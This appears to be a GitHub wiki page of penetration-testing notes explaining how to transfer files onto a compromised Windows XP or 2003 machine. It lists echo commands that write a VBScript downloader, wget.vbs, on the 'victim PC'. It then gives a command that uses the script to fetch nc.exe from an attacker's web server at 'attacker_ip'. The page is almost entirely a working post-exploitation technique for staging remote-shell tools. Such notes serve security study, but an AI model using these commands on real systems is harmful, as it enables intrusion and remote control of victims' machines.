-
Notifications
You must be signed in to change notification settings - Fork 14
File transfer VBScript
lethanhtung01011980 edited this page Dec 12, 2019
·
5 revisions
- For WinXP and 2003
To create wget.ws in victim PC
- echo strUrl = WScript.Arguments.Item(0) > wget.vbs
- echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
- echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
- echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
- echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
- echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
- echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
- echo Err.Clear >> wget.vbs
- echo Set http = Nothing >> wget.vbs
- echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
- echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
- echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
- echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
- echo http.Open "GET", strURL, False >> wget.vbs
- echo http.Send >> wget.vbs
- echo varByteArray = http.ResponseBody >> wget.vbs
- echo Set http = Nothing >> wget.vbs
- echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
- echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
- echo strData = "" >> wget.vbs
- echo strBuffer = "" >> wget.vbs
- echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
- echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
- echo Next >> wget.vbs
- echo ts.Close >> wget.vbs
To run wget.vbs to download file from attacker's web server
- cscript wget.vbs http://attacker_ip/nc.exe nc.exe
- To copy content of the above file in a non-interactive remote shell
- To execute and download a file